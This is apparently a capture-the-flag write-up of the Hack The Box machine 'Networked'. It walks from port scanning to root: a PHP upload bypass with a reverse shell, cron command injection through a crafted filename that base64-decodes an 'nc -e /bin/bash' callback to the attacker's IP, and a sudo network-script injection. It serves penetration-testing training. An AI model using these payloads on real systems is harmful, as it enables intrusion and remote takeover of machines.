Networked - wook413

#hackthebox #linux #easy ![[Pasted image 20250816210827.png]] # Information Gathering - Nmap I began with scanning all TCP ports and discovered two open ports: 22 and 80. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 23:41 UTC Nmap scan report for 10.10.10.146 Host is up (0.059s latency). Not shown: 65483 filtered tcp ports (no-response), 49 filtered tcp ports (host-prohibited), 1 closed tcp port (reset) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 43.85 seconds ``` Then another TCP scan with `-sCV` options for more information ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 23:43 UTC Nmap scan report for 10.10.10.146 Host is up (0.18s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA) | 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA) |_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.33 seconds ``` Lastly, an UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 23:44 UTC Nmap scan report for 10.10.10.146 Host is up (0.057s latency). PORT STATE SERVICE 53/udp filtered domain 67/udp filtered dhcps 123/udp filtered ntp 135/udp filtered msrpc 137/udp filtered netbios-ns 138/udp filtered netbios-dgm 161/udp filtered snmp 445/udp filtered microsoft-ds 631/udp filtered ipp 1434/udp filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds ``` # Enumeration ##### HTTP - TCP 80 The landing page of port 80 doesn't provide much information. Just 3 simple sentences. ![[Pasted image 20250816184608.png]] I ran `Gobuster` against the target and it discovered only 2 directories: `uploads` and `backup` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.146 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /uploads (Status: 301) [Size: 236] [--> http://10.10.10.146/uploads/] /backup (Status: 301) [Size: 235] [--> http://10.10.10.146/backup/] Progress: 87664 / 87665 (100.00%) =============================================================== Finished =============================================================== ``` `/uploads` has nothing but a `.` on the page, which is very strange. ![[Pasted image 20250816185804.png]] `/backup` has a compressed file available `backup.tar` ![[Pasted image 20250816185629.png]] I extracted files from the compressed `backup.tar`. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ tar -xvf backup.tar index.php lib.php photos.php upload.php ``` We can disregard `index.php` because it's not relevant. The remaining three files are connected and make up the file upload and gallery functionality. `/upload.php` has a file upload feature. ![[Pasted image 20250816191635.png]] `/photos.php` is supposed to be a gallery and it has 4 photos available. ![[Pasted image 20250816191815.png]] I tried to upload a random image file from my kali but it returned `invalid image file`. ![[Pasted image 20250816191921.png]] I think it's because of this part of `upload.php`. It's checking the file type and the file size. I think my `crab.png` file exceeded 60000 ```php if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo '<pre>Invalid image file.</pre>'; displayform(); } ``` # Initial Access - shell as `apache` I intercepted the request in `Burp` and removed a large chunk of the file to reduce the file size and this time it got accepted. ![[Pasted image 20250816193308.png]] As instructed, I refreshed `/photos.php` and found my file. It was renamed as `10_10_14_10.png` ![[Pasted image 20250816193424.png]] I changed the file name to `crab.php.png` and it still got accepted. As long as you have `.png` file extension at the end, it's accepted. (When all other conditions are met) ![[Pasted image 20250816193712.png]] Then I replaced the `png` data with a simple `PHP` payload. It was successfully uploaded. ![[Pasted image 20250816194122.png]] Right click on `10_10_14_10.php.png` and select `Open Image in New Tab` ![[Pasted image 20250816194209.png]] I tried running the `id` command, and it returned the output below, confirming that the site is indeed vulnerable to a combination of file upload and command injection. ![[Pasted image 20250816194326.png]] There could be many ways to get a reverse shell out of this situation. What I did was copy-paste the famous `Pentest Monkey`'s php-reverse shell and replaced the simple php payload with it. ![[Pasted image 20250816195136.png]] Then when I navigated to `/photos.php` the page started hanging and my listener successfully captured the reverse shell. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.146] 58300 Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 02:51:55 up 1:13, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=48(apache) gid=48(apache) groups=48(apache) sh: no job control in this shell sh-4.2$ whoami whoami apache ``` In `/home/guly`, there was `user.txt` but I can't read it as user `apache`. ```bash bash-4.2$ ls -l total 12 -r--r--r--. 1 root root 782 Oct 30 2018 check_attack.php -rw-r--r-- 1 root root 44 Oct 30 2018 crontab.guly -r--------. 1 guly guly 33 Aug 17 01:38 user.txt ``` # Privilege Escalation - shell as `guly` `check_attack.php` is written as follows: ```php bash-4.2$ cat check_attack.php <?php require '/var/www/html/lib.php'; $path = '/var/www/html/uploads/'; $logpath = '/tmp/attack.log'; $to = 'guly'; $msg= ''; $headers = "X-Mailer: check_attack.php\r\n"; $files = array(); $files = preg_grep('/^([^.])/', scandir($path)); foreach ($files as $key => $value) { $msg=''; if ($value == 'index.html') { continue; } #echo "-------------\n"; #print "check: $value\n"; list ($name,$ext) = getnameCheck($value); $check = check_ip($name,$value); if (!($check[0])) { echo "attack!\n"; # todo: attach file file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX); exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; mail($to, $msg, $msg, $headers, "-F$value"); } } ?> ``` `crontab.guly` file is written as follows: ```bash bash-4.2$ cat crontab.guly */3 * * * * php /home/guly/check_attack.php ``` `crontab guru` tells me `check_attack.php` file is scheduled to run at every 3rd minute. ![[Pasted image 20250816200241.png]] Looking at `check_attack.php` file again, I notice two variables are being used in `exec` function. `$path` is hardcoded as `/var/www/html/uploads/`, however `$value` appears to be something I can control. ![[Pasted image 20250816201315.png]] Before running the exploit, I tested the target shell to connect to my kali. The listener on my dies immediately after it sees the connection. ![[Pasted image 20250816202722.png]] base64-encoding the payload and decoding it back worked with good stability. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo nc -e /bin/bash 10.10.14.10 443 | base64 -w0 bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0Mwo= ``` ![[Pasted image 20250816203308.png]] `touch /var/www/html/uploads/wook; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0Mwo= | base64 -d | sh; wk` ```bash bash-4.2$ ls 10_10_14_10.php.png 10_10_14_10.png 127_0_0_1.png 127_0_0_2.png 127_0_0_3.png 127_0_0_4.png index.html wook; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0Mwo= | base64 -d | sh; wk ``` After waiting for `1/3` minute, I captured a shell as `guly`! ![[Pasted image 20250816204224.png]] Finally read `user.txt` ```bash [guly@networked ~]$ cat user.txt 8d3... ``` # Privilege Escalation - shell as `root` `sudo -l` command reveals that `guly` can run the following command as `root`. ```bash [guly@networked ~]$ sudo -l Matching Defaults entries for guly on networked: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User guly may run the following commands on networked: (root) NOPASSWD: /usr/local/sbin/changename.sh ``` `changename.sh` is written as follows: ```bash [guly@networked ~]$ cat /usr/local/sbin/changename.sh #!/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF DEVICE=guly0 ONBOOT=no NM_CONTROLLED=no EoF regexp="^[a-zA-Z0-9_\ /-]+quot; for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x done echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly done /sbin/ifup guly0 ``` When I run the command with `sudo`, `changename.sh` prompts me to enter several values including `interface NAME`, `PROXY_METHOD`, `BROWSER_ONLY`, and `BOOTPROTO`. ```bash [guly@networked ~]$ sudo /usr/local/sbin/changename.sh interface NAME: wook interface PROXY_METHOD: a interface BROWSER_ONLY: b interface BOOTPROTO: c ERROR : [/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization. ``` The exploit is very interesting. The network script `/etc/sysconfig/network-scripts/ifcfg-*` expects lines in the format `VARIABLE=value`. However, if a value contains spaces, Bash interprets the line like this: ```bash PROXY_METHOD=not a method ``` is parsed as: ```bash PROXY_METHOD=not # variable assignment a method # treated as separate commands ``` Using the vulnerability, I entered `a /bin/bash` as the value and `/bin/bash` was interpreted as a separate command which led to a shell as `root`. ```bash [guly@networked ~]$ sudo /usr/local/sbin/changename.sh interface NAME: wook interface PROXY_METHOD: a /bin/bash interface BROWSER_ONLY: b interface BOOTPROTO: c [root@networked network-scripts]# whoami root ``` Found `root.txt` ```bash [root@networked ~]# cat root.txt af5... ```